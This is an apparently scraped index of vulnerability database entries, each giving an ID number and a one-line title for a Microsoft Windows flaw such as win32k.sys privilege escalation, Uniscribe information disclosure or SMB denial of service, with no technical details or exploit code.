[98111] Microsoft Windows 7 SP1/Vista SP2 DVD Maker cross site request forgery [98110] Microsoft Windows Active Directory Federation Services information disclosure [98069] Microsoft Windows up to Server 2012 R2 Color Management privilege escalation [98068] Microsoft Windows up to Vista SP2 Graphics Component USP10!otlList::insertAt memory corruption [98067] Microsoft Windows up to Vista SP2 Color Management information disclosure [98066] Microsoft Windows Color Management information disclosure [98065] Microsoft Windows up to Vista SP2 GDI+ information disclosure [98058] Microsoft Windows iSNS Server memory corruption [98056] Microsoft Windows up to Server 2016 DNS Query information disclosure [98055] Microsoft Windows up to Vista SP2 DLL Loader privilege escalation [98054] Microsoft Windows up to Server 2016 SMBv2/SMBv3 denial of service [98052] Microsoft Windows up to Vista SP2 Uniscribe information disclosure [98051] Microsoft Windows up to Vista SP2 Uniscribe information disclosure [98050] Microsoft Windows up to Vista SP2 Uniscribe Read/Write memory corruption [98049] Microsoft Windows Uniscribe information disclosure [98048] Microsoft Windows Uniscribe information disclosure [98047] Microsoft Windows Uniscribe information disclosure [98046] Microsoft Windows Uniscribe information disclosure [98045] Microsoft Windows Uniscribe information disclosure [98044] Microsoft Windows Uniscribe information disclosure [98043] Microsoft Windows Uniscribe information disclosure [98042] Microsoft Windows Uniscribe information disclosure [98041] Microsoft Windows Uniscribe information disclosure [98040] Microsoft Windows Uniscribe information disclosure [98039] Microsoft Windows Uniscribe information disclosure [98038] Microsoft Windows Uniscribe information disclosure [98037] Microsoft Windows Uniscribe information disclosure [98036] Microsoft Windows Uniscribe information disclosure [98035] Microsoft Windows Uniscribe information disclosure [98034] Microsoft Windows Uniscribe information disclosure [98033] Microsoft Windows Uniscribe information disclosure [98032] Microsoft Windows Uniscribe information disclosure [98031] Microsoft Windows Uniscribe rule information disclosure [98030] Microsoft Windows Uniscribe memory corruption [98029] Microsoft Windows Uniscribe memory corruption [98028] Microsoft Windows Uniscribe memory corruption [98027] Microsoft Windows Uniscribe memory corruption [98026] Microsoft Windows Uniscribe memory corruption [98025] Microsoft Windows Uniscribe memory corruption [98024] Microsoft Windows Uniscribe Data Processing Error [98023] Microsoft Windows up to Vista SP2 SMB privilege escalation [98022] Microsoft Windows up to XP SP3 SMB information disclosure [98021] Microsoft Windows up to XP SP3 SMB privilege escalation [98020] Microsoft Windows up to XP SP3 SMB privilege escalation [98019] Microsoft Windows up to XP SP3 SMB privilege escalation [98018] Microsoft Windows up to XP SP3 SMB privilege escalation [98017] Microsoft Windows up to Server 2016 PDF memory corruption [98016] Microsoft Windows up to Vista SP2 Hyper-V privilege escalation [98015] Microsoft Windows 10/Server 2016 Hyper-V privilege escalation [98014] Microsoft Windows up to Vista SP2 Hyper-V information disclosure [98013] Microsoft Windows 10/Server 2016 Hyper-V vSMB privilege escalation [98012] Microsoft Windows up to Vista SP2 Hyper-V privilege escalation [98011] Microsoft Windows up to Vista SP2 Hyper-V privilege escalation [98010] Microsoft Windows up to Vista SP2 Hyper-V privilege escalation [98009] Microsoft Windows up to Vista SP2 Hyper-V privilege escalation [98007] Microsoft Windows 10/Server 2016 Hyper-V Network Switch privilege escalation [98006] Microsoft Windows 10/Server 2016 Hyper-V vSMB privilege escalation [96521] Microsoft Windows 8.1/10/Server 2012/Server 2016 SMB Response mrxsmb20.sys denial of service [95126] Microsoft Windows Local Security Authority Subsystem Service privilege escalation [94457] Microsoft Windows up to Vista SP2 Win32k privilege escalation [94456] Microsoft Windows up to Vista SP2 PFB Font win32k.sys Data Processing Error [94437] Microsoft Windows up to Vista SP2 Uniscribe LoadUvsTable Data Processing Error [94436] Microsoft Windows 10 Graphics Data Processing Error [94435] Microsoft Windows up to Vista SP2 Graphics Data Processing Error [94434] Microsoft Windows GDI information disclosure [93964] Microsoft Windows 7 Excel Starter 2010 XML External Entity [93963] Microsoft Windows Authorization Manager msxml3.dll File information disclosure [93962] Microsoft Windows 7 SP1 Event Viewer File information disclosure [93954] Microsoft Windows 7 SP1 NFO File MSINFO32.EXE XML External Entity [93953] Microsoft Windows Media Center 6.1.7600 MCL File ehshell.exe XML External Entity [93602] Microsoft Windows 7/10 cmd.exe privilege escalation [93419] Microsoft Windows up to Vista SP2 NTLM Password Change privilege escalation [93418] Microsoft Windows up to Vista SP2 Local Security Authority Subsystem Service privilege escalation [93390] Microsoft Windows up to Vista SP2 Open Type Font privilege escalation [93389] Microsoft Windows up to Server 2016 Media Foundation memory corruption [93388] Microsoft Windows up to Server 2016 Animation Manager Stylesheets memory corruption [93387] Microsoft Windows up to Vista SP2 Open Type Font information disclosure [93386] Microsoft Windows Vista SP2/7 SP1/8.1/RT 8.1/10 Video Control privilege escalation [93383] Microsoft Windows up to Vista SP2 Image File Upload privilege escalation [92596] Microsoft Windows 7 SP1/Server 2008 R2/Server 2008 SP2/Vista SP2 Internet Messaging API File information disclosure [92595] Microsoft Windows 10 Diagnostics Hub privilege escalation [92590] Microsoft Windows up to Vista SP2 win32k.sys privilege escalation [92589] Microsoft Windows up to Vista SP2 win32k.sys privilege escalation [92588] Microsoft Windows up to Vista SP2 win32k.sys privilege escalation [92587] Microsoft Windows 8.1/10/RT 8.1/Server 2012/Server 2012 R2 Transaction Manager privilege escalation [92586] Microsoft Windows up to Vista SP2 win32k.sys privilege escalation [92585] Microsoft Windows Vista SP2/7 SP1/8.1/RT 8.1/10 Video Control memory corruption [92583] Microsoft Windows up to Vista SP2 True Type Font privilege escalation [92582] Microsoft Windows up to Vista SP2 GDI+ privilege escalation [92581] Microsoft Windows up to Vista SP2 Graphics privilege escalation [92580] Microsoft Windows up to Vista SP2 win32k.sys privilege escalation [92579] Microsoft Windows up to Vista SP2 GDI+ information disclosure [92578] Microsoft Windows up to Vista SP2 GDI+ information disclosure [92577] Microsoft Windows up to Vista SP2 True Type Font information disclosure [91572] Microsoft Windows up to Vista Scripting Engine memory corruption [91571] Microsoft Windows 8.1/10/RT 8.1/Server 2012/Server 2012 R2 PDF Library information disclosure [91570] Microsoft Windows 8.1/10/RT 8.1/Server 2012/Server 2012 R2 PDF Library information disclosure [91569] Microsoft Windows up to Vista privilege escalation [91561] Microsoft Windows up to Vista Object memory corruption [91560] Microsoft Windows 10 Object memory corruption [91559] Microsoft Windows 8.1/10/RT 8.1 NTLM SSO privilege escalation [91540] Microsoft Windows up to Vista GDI memory corruption [91539] Microsoft Windows up to Vista GDI privilege escalation [91538] Microsoft Windows up to Vista GDI 7PK Security Features [91537] Microsoft Windows win32k.sys privilege escalation [91536] Microsoft Windows up to Vista win32k.sys privilege escalation [90934] Microsoft Windows 7/8.1 FON Font File win32k.sys denial of service [90713] Microsoft Windows up to Vista SP2 NetBIOS privilege escalation [90712] Microsoft Windows 10/10 1511 Universal Outlook information disclosure [90711] Microsoft Windows 8.1/10/RT 8.1/Server 2012/Server 2012 R2 PDF privilege escalation [90710] Microsoft Windows 8.1/RT 8.1/Server 2012/Server 2012 R2 Netlogon privilege escalation [90709] Microsoft Windows up to Vista SP2 Kerberos privilege escalation [90702] Microsoft Windows up to Vista SP2 Kernel-Mode Driver win32k privilege escalation [90701] Microsoft Windows up to Vista SP2 Kernel-Mode Driver win32k privilege escalation [90700] Microsoft Windows up to Vista SP2 Kernel-Mode Driver win32k privilege escalation [90699] Microsoft Windows up to Vista SP2 Kernel-Mode Driver win32k privilege escalation [90698] Microsoft Windows Graphics privilege escalation [90697] Microsoft Windows Graphics privilege escalation [90696] Microsoft Windows up to Vista SP2 Graphics privilege escalation [90252] Microsoft Windows TCP/IP NetBios Helper Service information disclosure [89605] Microsoft Windows NT 4.0/2000 Security Event Log denial of service [89604] Microsoft Windows NT 4.0/2000 Application Event Log denial of service [89571] Microsoft Windows IMAPI CD Burning COM privilege escalation [89570] Microsoft Windows Netmeeting Remote Desktop Sharing privilege escalation [89520] Microsoft Windows Terminal Services information disclosure [89505] Microsoft Windows FTP Server privilege escalation [89504] Microsoft Windows System Event Log privilege escalation [89444] Microsoft Windows Remote Desktop/Terminal Services Web Connection weak authentication [89431] Microsoft Windows FAT32 Partition Driver information disclosure [89417] Microsoft Windows RAS Connection weak encryption [89413] Microsoft Windows Default Share privilege escalation [89411] Microsoft Windows LanMan Hash weak authentication [89389] Microsoft Windows Auto Update information disclosure [89345] Microsoft Windows NetBIOS Shared Folder information disclosure [89344] Microsoft Windows NetBIOS/SMB Authentication information disclosure [89342] Microsoft Windows 95/98 LanMan Hash weak encryption [89340] Microsoft Windows 95/98 SMB Service memory corruption [89337] Microsoft Windows FTP Service denial of service [89335] Microsoft Windows NetBIOS/CIFS weak encryption [89303] Microsoft Windows Admin Account weak authentication [89299] Microsoft Windows LanMan Authentication weak authentication [89297] Microsoft Windows Startup Malware privilege escalation [89295] Microsoft Windows Services information disclosure [89294] Microsoft Windows Guest Account information disclosure [89293] Microsoft Windows Guest Account unknown vulnerability [89292] Microsoft Windows Guest Account Log information disclosure [89290] Microsoft Windows Security Log denial of service [89288] Microsoft Windows Winlogon privilege escalation [89259] Microsoft Windows Patch MS04-002 privilege escalation [89150] Microsoft Windows RAS weak encryption [89051] Microsoft Windows up to Vista SP2 .NET Framework information disclosure [89036] Microsoft Windows up to Vista SP2 Print Spooler ntprint.dll PSetupDownloadAndInstallLegacyDriver privilege escalation [89035] Microsoft Windows up to Vista SP2 Print Spooler ntprint.dll PSetupDownloadAndInstallLegacyDriver 7PK Security Features [89034] Microsoft Windows Server 2008/Vista SP2 JScript/VBScript memory corruption [88883] Microsoft Windows VeriSign weak authentication [88787] Microsoft Windows NT 4.0 RAS via PPP denial of service [88786] Microsoft Windows NT 4.0 NetBIOS Over TCP privilege escalation [88781] Microsoft Windows 2000 Active Directory Schema privilege escalation [88775] Microsoft Windows XP Digitally Sign weak authentication [88774] Microsoft Windows XP Digitally Sign weak authentication [88773] Microsoft Windows XP Digitally Sign weak authentication [88772] Microsoft Windows XP Session Key weak authentication [88765] Microsoft Windows 2000/2000 SP1/2000 SP2 Service Pack 3 privilege escalation [88763] Microsoft Windows Remote Data Services information disclosure [88706] Microsoft Windows up to NT 3.51 SP4/4.0 SP5 RRAS denial of service [88686] Microsoft Windows Locator Service information disclosure [88675] Microsoft Windows information disclosure [88670] Microsoft Windows Password Filter privilege escalation [88664] Microsoft Windows NT 4.0 TCP/IP Security privilege escalation [88658] Microsoft Windows NT 4.0 Device Driver privilege escalation [88657] Microsoft Windows NT 4.0/2000 DHCP Server information disclosure [88655] Microsoft Windows 2000 DNS Server privilege escalation [88649] Microsoft Windows information disclosure [88644] Microsoft Windows 2000 Active Directory Kerberos Ticket Logging privilege escalation [88630] Microsoft Windows Registry Permission privilege escalation [88598] Microsoft Windows NT 4.0/2000 privilege escalation [88438] Microsoft Windows 95/98 ICMP denial of service [88319] Microsoft Windows NT 4.0 File Protection privilege escalation [88316] Microsoft Windows privilege escalation [88313] Microsoft Windows W32/Deloder Worm privilege escalation [88311] Microsoft Windows UPnP TCP Helper information disclosure [88285] Microsoft Windows CIS information disclosure [88283] Microsoft Windows Terminal Services/Citrix Server weak authentication [88281] Microsoft Windows SvcOpenSCManager information disclosure [88280] Microsoft Windows DCE/RPC information disclosure [88276] Microsoft Windows shlwapi.dll denial of service [88269] Microsoft Windows Registry Password information disclosure [88268] Microsoft Windows information disclosure [88266] Microsoft Windows information disclosure [88265] Microsoft Windows information disclosure [88264] Microsoft Windows User information disclosure [88253] Microsoft Windows SMB Server privilege escalation [88251] Microsoft Windows Guest Account privilege escalation [88240] Microsoft Windows NT 4.0/NT 4.0 SP1/NT 4.0 SP2/NT 4.0 SP3 SNMP GET unknown vulnerability [88236] Microsoft Windows NT 4.0/2000/Server 2003/XP SNMP WINS privilege escalation [88210] Microsoft Windows Secure Site weak encryption [88199] Microsoft Windows NT 4.0 Ssping teardrop2 Patch denial of service [88198] Microsoft Windows DNS Server privilege escalation [88196] Microsoft Windows Force Shutdown from a Remote System Privilege privilege escalation [88195] Microsoft Windows Modify Firmware Environment Values Privilege privilege escalation [88194] Microsoft Windows Debug Programs Privilege privilege escalation [88193] Microsoft Windows Restore Files/Directories Privilege privilege escalation [88192] Microsoft Windows Backup Files/Directories Privilege privilege escalation [88191] Microsoft Windows Create a Pagefile Privilege privilege escalation [88190] Microsoft Windows Increase Scheduling Priority Privilege privilege escalation [88188] Microsoft Windows Profile Single Process Privilege privilege escalation [88187] Microsoft Windows Change the System Time Privilege privilege escalation [88186] Microsoft Windows Create Permanent Shared Objects Privilege privilege escalation [88185] Microsoft Windows Profile System Performance Privilege privilege escalation [88184] Microsoft Windows Act as Part of the Operating System Privilege privilege escalation [88183] Microsoft Windows Increase Quotas Privilege privilege escalation [88182] Microsoft Windows Load/Unload Device Drivers Privilege privilege escalation [88181] Microsoft Windows Lock Pages in Memory Privilege privilege escalation [88179] Microsoft Windows Protocol information disclosure [88178] Microsoft Windows Network Interface information disclosure [88173] Microsoft Windows rsh TCP Sequence privilege escalation [88172] Microsoft Windows Service Unknown information disclosure [88171] Microsoft Windows Registry File Association privilege escalation [88159] Microsoft Windows Remote Access Service information disclosure [88157] Microsoft Windows 2000/NT Password Policy weak authentication [88155] Microsoft Windows 2000/NT/XP LAN Manager weak encryption [88154] Microsoft Windows 2000/NT Username information disclosure [88153] Microsoft Windows 2000/NT information disclosure [88152] Microsoft Windows NetBIOS privilege escalation [88151] Microsoft Windows Registry privilege escalation [88150] Microsoft Windows NT Share information disclosure [87961] Microsoft Windows up to Server 2012 R2 Search privilege escalation [87960] Microsoft Windows Server 2008 R2/Server 2012/Server 2012 R2 Active Directory privilege escalation [87959] Microsoft Windows 8.1/10/Server 2012/Server 2012 R2 PDF information disclosure [87958] Microsoft Windows 8.1/10/Server 2012/Server 2012 R2 PDF privilege escalation [87957] Microsoft Windows 8.1/10/Server 2012/Server 2012 R2 PDF information disclosure [87952] Microsoft Windows 10/10 1511 Diagnostic Hub Data Processing Error [87951] Microsoft Windows up to Vista SP2 WPAD Data Processing Error [87950] Microsoft Windows up to Vista SP2 WPAD privilege escalation [87949] Microsoft Windows Netlogon privilege escalation [87948] Microsoft Windows up to Vista SP2 SMB Server privilege escalation [87947] Microsoft Windows up to Vista SP2 Adobe Type Manager Font Driver atmfd.dll privilege escalation [87946] Microsoft Windows 10 Kernel win32k.sys privilege escalation [87945] Microsoft Windows up to Vista SP2 Graphics Component information disclosure [87944] Microsoft Windows Server 2012/Server 2012 R2 Virtual PCI Memory information disclosure [87943] Microsoft Windows up to Vista SP2 Kernel win32k.sys privilege escalation [87942] Microsoft Windows up to Vista SP2 Kernel win32k.sys privilege escalation [87941] Microsoft Windows up to Vista SP2 Group Policy privilege escalation [87940] Microsoft Windows Server 2012/Server 2012 R2 DNS Server memory corruption [87935] Microsoft Windows Server 2008 R2 SP1/Server 2008 SP2/Vista SP2 VBScript/JScript privilege escalation [87934] Microsoft Windows Server 2008 R2 SP1/Server 2008 SP2/Vista SP2 VBScript/JScript privilege escalation [87933] Microsoft Windows Server 2008 R2 SP1/Server 2008 SP2/Vista SP2 VBScript/JScript privilege escalation [87167] Microsoft Windows up to Vista SP2 DirectX Graphics Kernel Subsystem privilege escalation [87166] Microsoft Windows up to Server 2012 R2 DirectX Graphics Kernel Subsystem privilege escalation [87165] Microsoft Windows up to Vista SP2 win32k.sys privilege escalation [87164] Microsoft Windows up to Vista SP2 win32k.sys information disclosure [87163] Microsoft Windows up to Vista SP2 win32k.sys privilege escalation [87162] Microsoft Windows up to Vista SP2 win32k.sys privilege escalation [87161] Microsoft Windows up to Vista SP2 win32k.sys privilege escalation [87160] Microsoft Windows up to Vista SP2 RPC Network Data Representation Engine privilege escalation [87158] Microsoft Windows Vista SP2/7 SP1/8.1 Media Center privilege escalation [87156] Microsoft Windows 8.1/10/RT 8.1/Server 2012 R2 Shell privilege escalation [87155] Microsoft Windows Vista SP2/7/8.1/RT 8.1/10 Journal privilege escalation [87154] Microsoft Windows up to Vista SP2 Imaging memory corruption [87153] Microsoft Windows up to Vista SP2 Direct3D memory corruption [87152] Microsoft Windows up to Vista SP2 Graphics Component privilege escalation [87151] Microsoft Windows up to Vista SP2 Graphics Component information disclosure [87150] Microsoft Windows up to Vista SP2 Graphics Component information disclosure [87145] Microsoft Windows Server 2008/Vista SP2 JScript/VBScript memory corruption [87144] Microsoft Windows Server 2008/Vista SP2 JScript/VBScript memory corruption [83151] Microsoft Windows EMF File GetEnhMetaFilePaletteEntries denial of service [82236] Microsoft Windows up to Vista SP2 OLE privilege escalation [82234] Microsoft Windows 10 HTTP.sys Data Processing Error [82231] Microsoft Windows up to Vista SP2 Font Library memory corruption [82226] Microsoft Windows up to Vista SP2 SAM/LSAD Badlock 7PK Security Features [82223] Microsoft Windows 8.1/10/Server 2012 R2 Hyper-V Memory information disclosure [82222] Microsoft Windows 8.1/10/Server 2012/Server 2012 R2 Memory information disclosure [82221] Microsoft Windows 8.1/10/Server 2012/Server 2012 R2 Hyper-V privilege escalation [81899] Microsoft Windows Media Services privilege escalation [81837] Microsoft Windows NT 4.0 SynAttackProtect denial of service [81815] Microsoft Windows NT 3.51/NT 4.0 Registry privilege escalation [81814] Microsoft Windows Telnet weak encryption [81813] Microsoft Windows XP weak encryption [81812] Microsoft Windows XP Network Client Feature weak authentication [81801] Microsoft Windows Logon Hours privilege escalation [81798] Microsoft Windows XP Remote Desktop information disclosure [81788] Microsoft Windows privilege escalation [81719] Microsoft Windows privilege escalation [81718] Microsoft Windows 4.0/4.0 SP1/4.0 SP2/4.0 SP3 Service Pack Patches privilege escalation [81685] Microsoft Windows Guest Account privilege escalation [81284] Microsoft Windows up to Vista SP2 .NET Framework privilege escalation [81283] Microsoft Windows up to Vista SP2 Kernel Mode Driver win32k.sys privilege escalation [81282] Microsoft Windows up to Vista SP2 Kernel Mode Driver win32k.sys privilege escalation [81281] Microsoft Windows up to Vista SP2 Kernel Mode Driver win32k.sys privilege escalation [81280] Microsoft Windows up to Vista SP2 Kernel Mode Driver win32k.sys privilege escalation [81279] Microsoft Windows up to Vista SP2 USB Mass Storage Class Driver privilege escalation [81277] Microsoft Windows privilege escalation [81276] Microsoft Windows up to Vista SP2 OLE privilege escalation [81275] Microsoft Windows up to Vista SP2 OLE privilege escalation [81271] Microsoft Windows 10 PDF Library privilege escalation [81270] Microsoft Windows 8.1/10/RT 8.1/Server 2012/Server 2012 R2 PDF Library privilege escalation [81269] Microsoft Windows up to Server 2012 R2 Media Parser privilege escalation [81268] Microsoft Windows up to Server 2012 R2 Media Parser privilege escalation [81267] Microsoft Windows up to Vista SP2 OpenType Font privilege escalation [81266] Microsoft Windows up to Vista SP2 OpenType Font privilege escalation [81265] Microsoft Windows Server 2008/Vista SP2 Library Loader privilege escalation [80885] Microsoft Windows 7 SP1/8.1/10/Server 2012/Server 2012 R2 RDP privilege escalation [80879] Microsoft Windows Network Policy Server RADIUS privilege escalation [80878] Microsoft Windows Server 2012 R2 Active Directory Federation Service privilege escalation [80877] Microsoft Windows up to Vista SP2 Forms information disclosure [80876] Microsoft Windows up to Vista SP2 .NET Framework privilege escalation [80874] Microsoft Windows 7 SP1/8.1/10/Server 2012/Server 2012 R2 RDP privilege escalation [80866] Microsoft Windows up to Vista SP2 DLL Loader privilege escalation [80865] Microsoft Windows 8.1/RT 8.1/Server 2012/Server 2012 R2 DLL Loader privilege escalation [80864] Microsoft Windows up to Vista DLL Loader privilege escalation [80863] Microsoft Windows up to Vista DLL Loader privilege escalation [80861] Microsoft Windows up to Vista SP2 Journal memory corruption [80860] Microsoft Windows 8.1/10/Server 2012/Server 2012 R2 Reader privilege escalation [80859] Microsoft Windows 8.1/10/Server 2012/Server 2012 R2 PDF Library memory corruption [80223] Microsoft Windows 10/1511 RDP Service 7PK Security Features [80220] Microsoft Windows up to Vista SP2 DirectShow memory corruption [80215] Microsoft Windows up to Vista SP2 win32k.sys privilege escalation [80214] Microsoft Windows up to Vista SP2 Graphics Device Interface GDI32.dll information disclosure [80213] Microsoft Windows up to Vista SP2 Sandbox privilege escalation [80212] Microsoft Windows up to Vista SP2 Sandbox privilege escalation [79515] Microsoft Windows 10 Kernel privilege escalation [79514] Microsoft Windows up to Vista Kernel privilege escalation [79513] Microsoft Windows up to Vista Kernel privilege escalation [79512] Microsoft Windows up to Vista Kernel privilege escalation [79511] Microsoft Windows Vista/7/8/8.1 Media Center privilege escalation [79510] Microsoft Windows Vista/7/8/8.1 Media Center information disclosure [79509] Microsoft Windows up to Vista PGM race condition [79508] Microsoft Windows up to Server 2012 R2 Library Loader privilege escalation [79507] Microsoft Windows up to Vista Library Loader privilege escalation [79506] Microsoft Windows 7/Server 2008/Server 2008 R2/Vista Library Loader privilege escalation [79499] Microsoft Windows 7/Server 2008 R2 Uniscribe Numeric Error [79495] Microsoft Windows up to Vista Graphics memory corruption [79494] Microsoft Windows up to Vista Graphics memory corruption [79493] Microsoft Windows Server 2008/Vista Graphics memory corruption [79492] Microsoft Windows DNS memory corruption [79191] Microsoft Windows Journal memory corruption [79184] Microsoft Windows up to Vista TLS Schannel privilege escalation [79183] Microsoft Windows up to Server 2012 R2 IPsec denial of service [79182] Microsoft Windows up to Vista Winsock privilege escalation [79174] Microsoft Windows up to Vista Kernel 7PK Security Features [79173] Microsoft Windows up to Server 2012 R2 Graphics information disclosure [79172] Microsoft Windows up to Vista Graphics privilege escalation [79171] Microsoft Windows up to Vista Graphics privilege escalation [79170] Microsoft Windows up to Vista Kernel information disclosure [79169] Microsoft Windows up to Vista Kernel privilege escalation [79168] Microsoft Windows up to Vista Kernel 7PK Security Features [79167] Microsoft Windows 7/Server 2008/Server 2008 R2/Vista Journal memory corruption [78364] Microsoft Windows 7 SP1/Vista SP2 Shell memory corruption [78363] Microsoft Windows up to Vista SP2 Shell memory corruption [77640] Microsoft Windows Active Directory Code [77636] Microsoft Windows up to Vista SP2 Journal File privilege escalation [77625] Microsoft Windows up to Vista SP2 Journal File Numeric Error [77622] Microsoft Windows up to Vista SP2 Journal File privilege escalation [77621] Microsoft Windows up to Vista SP2 Journal File privilege escalation [77620] Microsoft Windows up to Vista SP2 Journal File privilege escalation [77616] Microsoft Windows Vista SP2/7 SP1/8/8.1 Windows Media Center privilege escalation [77613] Microsoft Windows up to Vista SP2 Adobe Type Manager Library atmfd.dll privilege escalation [77042] Microsoft Windows up to Vista Filesystem privilege escalation [77041] Microsoft Windows up to Vista Registry privilege escalation [77040] Microsoft Windows up to Vista Object Manager privilege escalation [77039] Microsoft Windows up to Vista WebDAV SSL weak encryption [77038] Microsoft Windows Server 2008 SP2 UDDI Services cross site scripting [77037] Microsoft Windows Server 2012/Server 2012 R2 System Center Operations Manager cross site scripting [77035] Microsoft Windows up to Vista Server Message Block memory corruption [77034] Microsoft Windows up to Vista Remote Desktop Session Host privilege escalation [77033] Microsoft Windows up to Vista Remote Desktop Session Host privilege escalation [77032] Microsoft Windows up to Vista XML Core Services weak encryption [77031] Microsoft Windows up to Vista XML Core Services information disclosure [77030] Microsoft Windows up to Vista XML Core Services weak encryption [77029] Microsoft Windows up to Vista Shell Security Feature privilege escalation [77028] Microsoft Windows up to Vista KMD Security Feature privilege escalation [77027] Microsoft Windows up to Vista CSRSS privilege escalation [77026] Microsoft Windows up to Vista ASLR information disclosure [77025] Microsoft Windows up to Vista TrueType Font Parser privilege escalation [77024] Microsoft Windows up to Vista TrueType Font Parser privilege escalation [77023] Microsoft Windows up to Vista TrueType Font Parser privilege escalation [77022] Microsoft Windows up to Vista TrueType Font Parser privilege escalation [77021] Microsoft Windows up to Vista TrueType Font Parser privilege escalation [77020] Microsoft Windows up to Vista OpenType Font Parser privilege escalation [77019] Microsoft Windows up to Vista OpenType Font Parser Code [77018] Microsoft Windows up to Vista OpenType Font Parser privilege escalation [77017] Microsoft Windows up to Vista OpenType Font Parser privilege escalation [77016] Microsoft Windows up to Vista OpenType Font Parser privilege escalation [77015] Microsoft Windows up to Vista OpenType Font Parser Data Processing Error [76756] Microsoft Windows up to Vista SP2 Adobe Type Manager Library atmfd.dll memory corruption [76493] Microsoft Windows up to Vista SP2 OLE privilege escalation [76492] Microsoft Windows up to Vista SP2 OLE privilege escalation [76461] Microsoft Windows up to Server 2012 R2 Domain-Controller Communication Credentials information disclosure [76460] Microsoft Windows 7 SP1/8/Server 2012 RDP Server Service Data Processing Error [76449] Microsoft Windows 8/8.1/Server 2008/Server 2012/Server 2012 R2 Hyper-V 7PK Security Features [76448] Microsoft Windows 8.1/Server 2012 R2 Hyper-V memory corruption [75783] Microsoft Windows Server 2008/Server 2012 Active Directory Federation Services cross site scripting [75782] Microsoft Windows up to Vista Common Controls memory corruption [75760] Microsoft Windows Media Player 10/11/12 DataObject Code [75335] Microsoft Windows up to Vista SP2 Service Control Manager privilege escalation [75328] Microsoft Windows up to Vista Management Console memory corruption [75327] Microsoft Windows up to Vista SP2 Schannel weak encryption [75304] Microsoft Windows up to Vista SP2 TrueType Font Parser Data Processing Error [75303] Microsoft Windows up to Vista SP2 OpenType Font Parser information disclosure [75285] Microsoft Windows up to Vista SP2 Journal privilege escalation [75284] Microsoft Windows up to Vista SP2 Journal privilege escalation [75283] Microsoft Windows up to Vista SP2 Journal privilege escalation [75282] Microsoft Windows up to Vista SP2 Journal privilege escalation [75281] Microsoft Windows up to Vista SP2 Journal privilege escalation [75280] Microsoft Windows up to Vista SP2 Journal privilege escalation [74842] Microsoft Windows 8.1/Server 2012 R2 Hyper-V privilege escalation [74840] Microsoft Windows up to Vista EMF File privilege escalation [74834] Microsoft Windows Server 2012 R2 Active Directory Federation Services 3.0 privilege escalation [74833] Microsoft Windows 7 SP1/8/8.1/Server 2012/Server 2012 R2 HTTP Request HTTP.sys privilege escalation [74104] Microsoft Windows up to Vista Digital Certificate weak authentication [74022] Microsoft Windows up to Vista Certificate weak authentication [73972] Microsoft Windows up to Vista SP2 PNG Parser information disclosure [73963] Microsoft Windows up to Vista SP2 Photo Decoder information disclosure [73961] Microsoft Windows 7 SP1/8/8.1/Server 2012/Server 2012 R2 Remote Desktop Protocol Object Management denial of service [73960] Microsoft Windows Netlogon Service User 7PK Security Features [73959] Microsoft Windows up to Vista SP2 DLL Data Processing Error [73958] Microsoft Windows up to Vista SP2 Text Services Data Processing Error [73957] Microsoft Windows up to Vista Adobe Font Driver privilege escalation [73956] Microsoft Windows up to Vista Adobe Font Driver privilege escalation [73955] Microsoft Windows up to Vista Adobe Font Driver privilege escalation [73954] Microsoft Windows up to Vista Adobe Font Driver privilege escalation [73953] Microsoft Windows up to Vista Adobe Font Driver information disclosure [73952] Microsoft Windows up to Vista Adobe Font Driver privilege escalation [73951] Microsoft Windows up to Vista Adobe Font Driver information disclosure [73950] Microsoft Windows up to Vista Adobe Font Driver memory corruption [73938] Microsoft Windows VBScript Scripting Engine denial of service [69258] Microsoft Windows up to Vista Secure Channel FREAK weak encryption [69161] Microsoft Windows up to Vista information disclosure [69160] Microsoft Windows up to Server 2012 Process privilege escalation [69159] Microsoft Windows up to Vista Group Policy 7PK Security Features [69154] Microsoft Windows up to Vista Group Policy weak authentication [69153] Microsoft Windows up to Vista Font Mapper win32k.sys privilege escalation [69152] Microsoft Windows up to Vista True Type Font win32k.sys privilege escalation [69151] Microsoft Windows up to Vista Kernel-Mode Driver win32k.sys memory corruption [69150] Microsoft Windows up to Vista win32k.sys privilege escalation [69149] Microsoft Windows up to Vista Cryptography Next Generation cng.sys information disclosure [69148] Microsoft Windows up to Vista Win32k.sys privilege escalation [68596] Microsoft Windows Internet Authentication Service denial of service [68593] Microsoft Windows up to Server 2012 Network Location Awareness Service privilege escalation [68590] Microsoft Windows up to Vista TS WebProxy directory traversal [68589] Microsoft Windows up to Vista Telnet Server memory corruption [66827] Microsoft Windows Media Player 11.0.5721.5230 memory corruption [66445] Microsoft Windows 8.0/8.1 XMLDOM ActiveX Control privilege escalation [65723] Microsoft Windows Authenticode WinVerifyTrust privilege escalation [62913] Microsoft Windows up to XP SP3 Shell Numeric Error [61648] Microsoft Windows XP privilege escalation [60245] Microsoft Windows unknown vulnerability [60209] Microsoft Windows msvcrt.dll memory corruption [60065] Microsoft Windows 2000 mod_sql information disclosure [59391] Microsoft Windows memory corruption [59006] Microsoft Windows Media Center TV Pack memory corruption [59004] Microsoft Windows memory corruption [58991] Microsoft Windows XP memory corruption [58238] Microsoft Windows Data Access Components memory corruption [58236] Microsoft Windows TCP/IP Stack denial of service [57812] Microsoft Windows XP lots-of-polys-example.html privilege escalation [57692] Microsoft Windows XP denial of service [57085] Microsoft Windows msgsc.dll memory corruption [57080] Microsoft Windows privilege escalation [57014] Microsoft Windows Default Configuration [56779] Microsoft Windows Stream Buffer Engine SBE.dll privilege escalation [56598] Microsoft Windows Azure Sdk up to 1.2 privilege escalation [56383] Microsoft Windows privilege escalation [56176] Microsoft Windows 7/Server 2003/XP fxscover.exe CDrawPoly::Serialize memory corruption [55937] Microsoft Windows XP denial of service [55777] Microsoft Windows Movie Maker 2.6 memory corruption [55776] Microsoft Windows memory corruption [55775] Microsoft Windows Media Encoder 9 memory corruption [54982] Microsoft Windows 7/Vista SP2 denial of service [54981] Microsoft Windows R2 privilege escalation [54718] Microsoft Windows up to XP SP3 Print Spooler EmeraldThread privilege escalation [54717] Microsoft Windows privilege escalation [54555] Microsoft Windows 6.00.2900.5512 wab.exe memory corruption [54553] Microsoft Windows sdclt.exe weak encryption [54552] Microsoft Windows smmscrpt.dll memory corruption [54551] Microsoft Windows contact memory corruption [54547] Microsoft Windows grpconv.exe memory corruption [54342] Microsoft Windows privilege escalation [54341] Microsoft Windows Movie Maker 2.1 privilege escalation [54334] Microsoft Windows privilege escalation [54333] Microsoft Windows denial of service [54332] Microsoft Windows privilege escalation [53591] Microsoft Windows Server 2003 GetServerName cross site scripting [53511] Microsoft Windows privilege escalation [53207] Microsoft Windows Graphics Driver cdd.dll Numeric Error 